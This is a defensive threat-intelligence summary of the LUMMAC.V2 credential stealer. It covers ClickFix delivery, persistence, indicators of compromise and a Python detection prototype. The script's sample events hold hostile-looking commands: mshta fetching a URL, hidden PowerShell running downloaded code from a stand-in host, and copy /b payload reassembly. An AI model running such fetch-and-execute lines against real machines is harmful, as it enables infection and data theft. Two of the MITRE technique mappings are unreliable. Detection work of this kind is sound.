LUMMAC.V2 is a sophisticated credential-stealing malware targeting a wide range of applications, delivered primarily through social engineering involving fake CAPTCHA pages and PowerShell loaders. It employs multiple evasion and persistence techniques, including DLL hijacking, process hollowing, and AutoIt-based droppers, impacting user security and enterprise detection systems. #LUMMAC.V2 #GoogleSecOps #Mandiant
Key points
- LUMMAC.V2 is an advanced infostealer malware targeting browsers, crypto wallets, password managers, email clients, and other applications, collecting sensitive data such as credentials, cookies, and screenshots.
- The malware is commonly distributed via “ClickFix” social engineering, where users are tricked into running malicious PowerShell commands disguised as CAPTCHA verification steps.
- The infection lifecycle includes downloading and extracting malicious payloads into AppData folders, followed by execution and persistence via registry Run keys.
- Three main payload delivery variations exist: DLL hijacking exploiting vulnerable executables, process hollowing injecting code into legitimate processes, and an AutoIt-based memory-only dropper with sophisticated anti-analysis checks.
- LUMMAC.V2 uses encrypted and obfuscated communication with command and control servers hosted behind Cloudflare to avoid detection and ensure resilient infrastructure.
- The malware exfiltrates stolen data via HTTP POST requests containing unique identifiers and can receive additional commands or payloads from the C2 server.
- Mandiant and Google SecOps provide Yara-L 2.0 detection queries and custom rules for hunting and detecting LUMMAC.V2 infections and its common techniques in telemetry data.
MITRE Techniques
- [T1218.005] System Binary Proxy Execution: Mshta – Used to trick users into executing mshta.exe to download and execute malicious files. (“Distribution campaigns leading to LUMMAC.V2 have been observed tricking users into executing mshta.exe to fetch a file from a URL and execute its contents.”)
- [T1105] Ingress Tool Transfer – PowerShell commands download malicious payloads from remote URLs using Invoke-WebRequest. (“PowerShell cmdlets that download second stage malware components.”)
- [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell executes obfuscated scripts invisibly to load malware components. (“PowerShell.exe -W Hidden -command … to download and execute script in memory.”)
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Used to concatenate multiple file fragments into a malicious executable with cmd copy /b commands. (“LUMMAC.V2 reconstructs malicious files on hosts by concatenating separate fragments.”)
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Persistence via registry entries pointing to malware in AppData folders. (“The script adds a registry entry under HKCU… ensuring execution upon user logon.”)
- [T1055.012] Process Hollowing – Replacing a legitimate process’s memory with malicious code, such as BitLockerToGo.exe. (“MyDockFinder.exe uses process hollowing to compromise the legitimate Windows process.”)
- [T1574.001] DLL Search Order Hijacking – Dropping malicious DLLs loaded preferentially over legitimate ones to execute malware. (“Setup.exe inadvertently loads the malicious takdecolib.dll instead.”)
- [T1086] PowerShell – Use of Invoke-Expression (iex) and hidden window execution for malware loading. (“PowerShell command runs script in memory using Invoke-Expression.”)
- [T1499] Endpoint Denial of Service (Implied by Anti-analysis techniques) – Anti-analysis checks against sandbox and antivirus applications to evade detection. (“It scans for security applications and employs anti-debugging techniques to avoid analysis.”)
Indicators of Compromise
- [IP Addresses / URLs] Malicious domains used for payload delivery – finalstepgo[.]com, axile[.]shop, cdn5-dispatcher-mp.oss-ap-northeast-2.aliyuncs[.]com
- [File Hashes] Extracted payload SHA256 hash – 842639021ac1b780ee77e7c40ca98745677cbf156764201638b6d33ac8c6f548 (LUMMAC.V2 payload)
- [File Names] Executables and scripts – Perspective.exe, Setup.exe, takdecolib.dll, MyDockFinder.exe, Vkcm1ks1s3.exe, Northwest.bat, A.a3x, Permanent.pif
- [Registry Keys] Persistence key – HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tE1koeXl (points to Perspective.exe in AppData)
- [Process Names] Commonly abused processes – mshta.exe, BitLockerToGo.exe, PowerShell.exe
- [Yara-L Queries] Detection signatures targeting mshta.exe with HTTP URLs, PowerShell with encoded commands, cmd copy /b file concatenations, and PowerShell launching executables in AppData\Roaming
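The four hunting ideas above (and the hidden-window in-memory PowerShell pattern quoted under T1059.001 and T1086) can be prototyped over a handful of process-creation events before they are written as Yara-L. The script below is an added example and is not the Mandiant/Google SecOps rule text; the event schema (id, parent image name, child image path, command line), the `.invalid` domains, the base64 placeholder and every sample event are constructed for this illustration.

```python
"""Toy hunting pass over constructed process-creation events.

Re-implements in Python the four LUMMAC.V2 hunting ideas the page lists
for Yara-L (mshta.exe with an HTTP URL, PowerShell with an encoded or
hidden in-memory command, cmd.exe 'copy /b' concatenation, PowerShell
spawning an executable from AppData\\Roaming). The event schema and all
sample values are constructed for this example; none of it is telemetry
or rule text from the Mandiant write-up.
"""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]  # assumed keys: id, parent, image, cmdline

# Constructed sample log. Domains use the reserved .invalid TLD and the
# base64 blob is a placeholder, not a real encoded command.
SAMPLE_EVENTS: List[Event] = [
    {"id": "e1", "parent": "explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://lure.invalid/verify"},
    {"id": "e2", "parent": "mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -W Hidden -EncodedCommand UGxhY2Vob2xkZXI="},
    {"id": "e3", "parent": "powershell.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c copy /b part1.bin + part2.bin + part3.bin Northwest.exe"},
    {"id": "e4", "parent": "powershell.exe",
     "image": r"C:\Users\alice\AppData\Roaming\Perspective.exe",
     "cmdline": "Perspective.exe"},
    {"id": "e5", "parent": "powershell.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -command "iex (Invoke-WebRequest http://lure.invalid/s)"'},
    # Benign look-alikes that must NOT fire:
    {"id": "b1", "parent": "explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\about.hta"},  # local .hta, no URL
    {"id": "b2", "parent": "services.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},  # -E.. is not -EncodedCommand
    {"id": "b3", "parent": "powershell.exe",
     "image": r"C:\Program Files\Vendor\updater.exe",
     "cmdline": "updater.exe /quiet"},  # spawned by PowerShell, but not from AppData\Roaming
]

_URL = re.compile(r"https?://", re.I)
# -e, -ec, -enc, -encodedcommand: the abbreviations of -EncodedCommand seen most often.
_ENCODED = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\b", re.I)
_HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)
_IN_MEMORY = re.compile(r"\b(?:iex|invoke-expression|invoke-webrequest|iwr)\b", re.I)
_COPY_B = re.compile(r"\bcopy\s+/b\b", re.I)
_APPDATA_ROAMING_EXE = re.compile(r"\\appdata\\roaming\\.*\.(?:exe|pif)$", re.I)
_POWERSHELL = ("powershell.exe", "pwsh.exe")


def _basename(path: str) -> str:
    """Lower-cased final path component, tolerant of either slash."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_mshta_http(e: Event) -> bool:
    return _basename(e["image"]) == "mshta.exe" and bool(_URL.search(e["cmdline"]))


def rule_powershell_encoded_or_in_memory(e: Event) -> bool:
    if _basename(e["image"]) not in _POWERSHELL:
        return False
    c = e["cmdline"]
    return bool(_ENCODED.search(c)) or (bool(_HIDDEN.search(c)) and bool(_IN_MEMORY.search(c)))


def rule_cmd_copy_b(e: Event) -> bool:
    return _basename(e["image"]) == "cmd.exe" and bool(_COPY_B.search(e["cmdline"]))


def rule_powershell_spawns_appdata_exe(e: Event) -> bool:
    return _basename(e["parent"]) in _POWERSHELL and bool(_APPDATA_ROAMING_EXE.search(e["image"]))


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("mshta_http_url", rule_mshta_http),
    ("powershell_encoded_or_in_memory", rule_powershell_encoded_or_in_memory),
    ("cmd_copy_b_concat", rule_cmd_copy_b),
    ("powershell_spawns_appdata_exe", rule_powershell_spawns_appdata_exe),
]


def detect(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule_name, event_id) for every rule that matches each event, in log order."""
    return [(name, e["id"]) for e in events for name, fn in RULES if fn(e)]


if __name__ == "__main__":
    for name, eid in detect(SAMPLE_EVENTS):
        print(f"{eid}: {name}")
```

The benign look-alikes are the part worth keeping when porting this to Yara-L: `-ExecutionPolicy` must not be read as `-EncodedCommand`, a local `.hta` opened by mshta.exe is normal, and PowerShell spawning an installer from Program Files is routine, so each rule keys on the specific combination the page describes (URL in the mshta command line, the AppData\Roaming path of the child, the `copy /b` token) rather than on the process name alone.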